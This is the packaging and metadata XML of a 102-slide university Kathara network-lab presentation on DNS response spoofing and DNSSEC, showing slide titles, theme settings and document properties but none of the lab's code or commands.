              <a:gd name="adj2" fmla="val -308978"/>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DNS response packet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="973866265"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="slides-template">
  <a:themeElements>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fontScheme name="slides-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lide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lide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lide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lide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lide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lide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lide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lide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lide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lide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lides-template 13">
        <a:dk1>
          <a:srgbClr val="000000"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="FFFFFF"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="FF0000"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="808080"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="99C4DF"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="FCEA04"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="FFFFFF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="000000"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="CADEEC"/>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CEF9E157-3A07-1948-A978-1A0E0EF844D0}" vid="{6931B5DE-37A9-0140-8222-582175C387CF}"/>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F8297A7-B94C-483D-AD38-856490F0F154}">
  <we:reference id="WA200005566" version="3.0.0.3" store="Omex" storeType="OMEX"/>
  <we:alternateReferences>
    <we:reference id="WA200005566" version="3.0.0.3"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EB2CA632F902743835D1E561AFB238F" ma:contentTypeVersion="16" ma:contentTypeDescription="Creare un nuovo documento." ma:contentTypeScope="" ma:versionID="3212e702edaf026d34f3f463c2b197f1">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="81e8b71c-ed62-4b5a-8a6a-dfc35b998427" xmlns:ns4="37c45f14-d49a-44b2-a48a-3f25cba2ab6d" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="c7890791843b95e4852a59e66f9e0c3a" ns3:_="" ns4:_="">
    <xsd:import namespace="81e8b71c-ed62-4b5a-8a6a-dfc35b998427"/>
    <xsd:import namespace="37c45f14-d49a-44b2-a48a-3f25cba2ab6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Location" minOccurs="0"/>
                <xsd:element ref="ns4:MediaLengthInSeconds" minOccurs="0"/>
                <xsd:element ref="ns4:MediaServiceAutoKeyPoints" minOccurs="0"/>
                <xsd:element ref="ns4:MediaServiceKeyPoint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e8b71c-ed62-4b5a-8a6a-dfc35b998427" elementFormDefault="qualified">
    <xsd:import namespace="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <xsd:import namespace="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <xsd:element name="SharedWithUsers" ma:index="8" nillable="true" ma:displayName="Condivis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description="" ma:internalName="SharedWithDetails" ma:readOnly="true">
      <xsd:simpleType>
        <xsd:restriction base="dms:Note">
          <xsd:maxLength value="255"/>
        </xsd:restriction>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="SharingHintHash" ma:index="10" nillable="true" ma:displayName="Hash suggerimento condivisione"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c45f14-d49a-44b2-a48a-3f25cba2ab6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37c45f14-d49a-44b2-a48a-3f25cba2ab6d" xsi:nil="true"/>
  </documentManagement>
</p:properties>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{D71EC864-2156-4B21-A067-1D25A4DE593D}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="37c45f14-d49a-44b2-a48a-3f25cba2ab6d"/>
    <ds:schemaRef ds:uri="81e8b71c-ed62-4b5a-8a6a-dfc35b9984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F04DE2C-E681-4AC7-A274-897442D1E104}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{D33CB6BD-420D-45A7-A697-6C9DAB4721DA}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://purl.org/dc/dcmitype/"/>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <ds:schemaRef ds:uri="37c45f14-d49a-44b2-a48a-3f25cba2ab6d"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/elements/1.1/"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/terms/"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://www.w3.org/XML/1998/namespace"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="81e8b71c-ed62-4b5a-8a6a-dfc35b998427"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>Kathara Template new Logo</Template>
  <TotalTime>1758</TotalTime>
  <Words>9521</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>1491</Paragraphs>
  <Slides>102</Slides>
  <Notes>7</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102</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="111" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Lucida Console</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>slides-template</vt:lpstr>
      <vt:lpstr>kathara lab</vt:lpstr>
      <vt:lpstr>copyright notice</vt:lpstr>
      <vt:lpstr>lab configuration without dnssec</vt:lpstr>
      <vt:lpstr>content of the lab without dnssec and redundancy</vt:lpstr>
      <vt:lpstr>network topology</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Python code for DNS response spoofing and forwarding</vt:lpstr>
      <vt:lpstr>Python code for DNS response spoofing and forwarding</vt:lpstr>
      <vt:lpstr>Python code for DNS response spoofing and forwarding</vt:lpstr>
      <vt:lpstr>Python code for DNS response spoofing and forwarding</vt:lpstr>
      <vt:lpstr>Python code for DNS response spoofing and forwarding</vt:lpstr>
      <vt:lpstr>Python code for DNS response spoofing and forwarding</vt:lpstr>
      <vt:lpstr>Python code for DNS response spoofing and forwarding</vt:lpstr>
      <vt:lpstr>Python code for DNS response spoofing and forwarding</vt:lpstr>
      <vt:lpstr>Python code for DNS response spoofing and forwarding</vt:lpstr>
      <vt:lpstr>start the lab</vt:lpstr>
      <vt:lpstr>attack simulation without dnssec</vt:lpstr>
      <vt:lpstr>iptables command</vt:lpstr>
      <vt:lpstr>run Python script</vt:lpstr>
      <vt:lpstr>sniff the traffic</vt:lpstr>
      <vt:lpstr>firefox</vt:lpstr>
      <vt:lpstr>firefox</vt:lpstr>
      <vt:lpstr>firefox</vt:lpstr>
      <vt:lpstr>view hacker database</vt:lpstr>
      <vt:lpstr>view hacker database</vt:lpstr>
      <vt:lpstr>wireshark</vt:lpstr>
      <vt:lpstr>wireshark</vt:lpstr>
      <vt:lpstr>wireshark</vt:lpstr>
      <vt:lpstr>lab configuration with dnssec and without redundancy</vt:lpstr>
      <vt:lpstr>network topology</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start the lab</vt:lpstr>
      <vt:lpstr>attack simulation with dnssec</vt:lpstr>
      <vt:lpstr>iptables command</vt:lpstr>
      <vt:lpstr>run Python script</vt:lpstr>
      <vt:lpstr>sniff the traffic</vt:lpstr>
      <vt:lpstr>firefox</vt:lpstr>
      <vt:lpstr>firefox</vt:lpstr>
      <vt:lpstr>wireshark</vt:lpstr>
      <vt:lpstr>wireshark</vt:lpstr>
      <vt:lpstr>trust-anchors view</vt:lpstr>
      <vt:lpstr>view hacker database</vt:lpstr>
      <vt:lpstr>view hacker database</vt:lpstr>
      <vt:lpstr>lab configuration with dnssec and redundancy</vt:lpstr>
      <vt:lpstr>content of the lab with dnssec and redundancy</vt:lpstr>
      <vt:lpstr>network topology</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start the lab</vt:lpstr>
      <vt:lpstr>attack simulation with dnssec and redundancy</vt:lpstr>
      <vt:lpstr>iptables command</vt:lpstr>
      <vt:lpstr>run Python script</vt:lpstr>
      <vt:lpstr>firefox</vt:lpstr>
      <vt:lpstr>firefox</vt:lpstr>
      <vt:lpstr>firefox</vt:lpstr>
      <vt:lpstr>wireshark</vt:lpstr>
      <vt:lpstr>wireshark</vt:lpstr>
      <vt:lpstr>trust-anchors view</vt:lpstr>
      <vt:lpstr>view hacker database</vt:lpstr>
      <vt:lpstr>view hacker database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Netkit lab - arp</dc:title>
  <dc:subject>Address Resolution Protocol for local and non local traffic</dc:subject>
  <dc:creator>G. Di Battista, M. Patrignani, M. Pizzonia, F. Ricci, M. Rimondini</dc:creator>
  <cp:keywords>Netkit, ARP</cp:keywords>
  <cp:lastModifiedBy>DANIELE VILLA</cp:lastModifiedBy>
  <cp:revision>76</cp:revision>
  <cp:lastPrinted>2001-12-19T21:14:42Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2000-11-11T21:58:48Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-20T11:54:17Z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80</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="ScreenSize">
    <vt:i4>2</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="ScreenUsage">
    <vt:i4>1</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MailAddress">
    <vt:lpwstr>patrigna@dia.uniroma3.it</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="HomePage">
    <vt:lpwstr>http://www.dia.uniroma3.it/~patrigna</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C:\titto\teaching\ie</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="22" name="ContentTypeId">
    <vt:lpwstr>0x0101007EB2CA632F902743835D1E561AFB238F</vt:lpwstr>
  </property>
</Properties>
</file>